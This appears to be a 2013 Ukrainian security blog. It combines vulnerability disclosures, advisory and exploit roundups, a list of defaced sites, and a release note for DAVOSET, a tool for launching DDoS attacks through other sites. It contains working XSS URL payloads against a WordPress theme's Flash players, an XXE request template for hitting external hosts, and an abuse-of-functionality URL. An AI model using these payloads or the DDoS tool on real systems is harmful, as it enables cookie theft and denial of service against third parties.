Websecurity - Веб безпека

Сьогодні вийшла нова версія програми DAVOSET v.1.0.7. В новій версії:

• Додав нові сервіси в обидва списки зомбі.
• Видалив непрацюючі адреси сервісів з обох списків.
• Зробив, щоб програма не закривалася при помилках з’єднання.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.0.7.rar.

06.06.2013

Виявлені численні уразливості безпеки в Google Chrome та Chromium.

Уразливі продукти: Google Chrome 27.0, Chromium 27.0.

Використання пам’яті після звільнення, DoS, короткочасні умови, витік інформації, XSS.

• chromium-browser security update (деталі)

21.06.2013

Додаткова інформація.

• chromium-browser security update (деталі)

В даній добірці експлоіти в веб додатках:

• Sony CH / DH Cross Site Request Forgery Vulnerability (деталі)
• Novell Zenworks Mobile Device Management Local File Inclusion (деталі)
• Sun Java Web Start Double Quote Injection Vulnerability (деталі)
• Java Applet Driver Manager Privileged toString() Remote Code Execution (деталі)
• Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (деталі)

У червні, 19.06.2013, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation на сайті http://freetranslation.com (зокрема на піддомені fets3.freetranslation.com). Про що найближчим часом сповіщу адміністрацію сайта.

Це онлайн перекладач. Даний сервіс може використовуватися для проведення атак на інші сайти - подібно до перекладачів від Google і Yahoo, про що я писав раніше. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

• редиректор

Abuse of Functionality:

http://fets3.freetranslation.com/?Url=http://google.com&Language=English%2FSpanish&Sequence=core

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

У даному функціоналі немає захисту від автоматизованих запитів (капчі).

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.fabrika.gov.ua (хакером Sejeal) - 04.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://man.gov.ua (хакером Ali Hafez Wallace) - 25.04.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.uames.org.ua (хакером Hmei7) - 04.01.2013, зараз сайт вже виправлений адмінами
• http://yrin.com (хакером Hmei7) - 09.01.2013, зараз сайт вже виправлений адмінами
• http://isell.org.ua (хакером Ops507) - зараз сайт похаканий та інфікований

Виявлене переповнення буфера в PHP.

Уразливі версії: PHP 5.4.

Переповнення буфера у функції quoted_printable_encode().

• Heap-based overflow in PHP (деталі)

11.04.2013

У січні, 31.01.2013, я знайшов Full path disclosure, Cross-Site Scripting та Content Spoofing уразливості в темі Slash WP для WordPress. Про що найближчим часом повідомлю розробникам шаблону.

Раніше я вже писав про уразливості в темі Chocolate WP для WordPress від цих розробників.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.06.2013

Full path disclosure (WASC-13):

http://site/wp-content/themes/slash-wp/

FPD в index.php та інших php-файлах в папці плагіна та підпапках.

Cross-Site Scripting (WASC-08):

В темі використовується jPlayer 2.1.0 та JW Player 5.8.2011, про уразливості в яких я вже писав.

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

На деяких сайтах з цією темою флешка JW Player є, на інших немає. Згідно з описом теми, JW Player підтримується темою, але не входить в стандартну поставку (лише jPlayer). Але його можна встановити окремо, що і роблять деякі власники сайтів.

Content Spoofing (WASC-12):

Про Content Spoofing уразливості та про інші XSS уразливості в JW Player та в jPlayer, ми можете прочитати у відповідних записах.

Уразливі всі версії теми Slash WP для WordPress.

В статті Використання XML External Entities (XXE) для атак на інші сайти я вже розповідав про XXE уразливості, що можуть використовуватися для атак на інші сайти. І зараз я продовжу тему використання XXE уразливостей для DoS і DDoS атак.

В класифікації уразливостей WASC TC v2.0 є такий клас як XML External Entities (XXE) (WASC-43). Який ще називають XXE Injection.

Окрім використання даних уразливостей для читання вмісту локальних файлів, їх можна використати для з’єднання з зовнішніми серверами. Тобто можна робити запити до інших веб сайтів і через дані уразливості можна проводити CSRF і DoS атаки на інші сайти.

Атака відбувається через тег ENTITY. Якщо в ньому вказати зовнішній ресурс - “http://site/page”, то відбудеться запит до сторінки зовнішнього сайта. Що можна використати для атак на зовнішні сайти, як я писав в попередній статті.

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT methodName ANY>
  <!ENTITY xxe SYSTEM "http://site/page" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>

XXE Injection уразливості були виявлені в багатьох продуктах. Окрім раніше згаданих продуктів, наведу нові програми з XXE уразливостями:

• libraptor - уразливість в бібліотеці, що використовується багатьма програмами, зокрема офісними пакетами. Аналогічно її можуть використовувати й веб додатки (зокрема Ruby підтримує бібліотеку libraptor), які будуть вразливі для даних атак.
• Advanced XML Reader - плагін для WordPress.
• PHP 5.3 і 5.4 - дана уразливість була виправлена PHP 5.3.23 та PHP 5.4.13. В попередніх версіях PHP, веб додатки, що працюють з SOAP WSDL-файлами, можуть використовуватися для даних атак.
• WordPress 3.5 і 3.5.1 - окрім плагінів для WP, XXE уразливість також є в самому движку.
• Sybase EAServer - вразливі 6.3.1 та попередні весії.
• Spring Framework - вразливі додатки, що використовують даний framework.

Для автоматизації атак на інші сайти можна використати такий інструмент як DDoS attacks via other sites execution tool (DAVOSET). Abuse of Functionality дірки передбачали відправлення як GET, так і POST запитів. DAVOSET був розроблений для GET запитів.

XXE Injection атака передбачає відправлення спеціального XML-запиту методом POST. Тому інструмент для проведення атак на інші сайти через XXE уразливості повинен підтримувати POST метод. І його підтримку я планую додати в DAVOSET.

Виявлені численні уразливості безпеки в Apple Safari та WebKit.

Уразливі версії: Apple Safari 6.0.

Численні пошкодження пам’яті і міжсайтовий скриптінг.

• APPLE-SA-2013-06-04-2 Safari 6.0.5 (деталі)

В даній добірці експлоіти в веб додатках:

• Airlive IP Cameras - Multiple Vulnerabilities (деталі)
• TP-LINK TL-SC3171 Authentication Bypass Vulnerability (деталі)
• Exim sender_address Parameter - RCE Exploit (деталі)
• MS13-037 Microsoft Internet Explorer textNode Use-After-Free (деталі)
• Quick TFTP Server 2.2 - Denial of Service (деталі)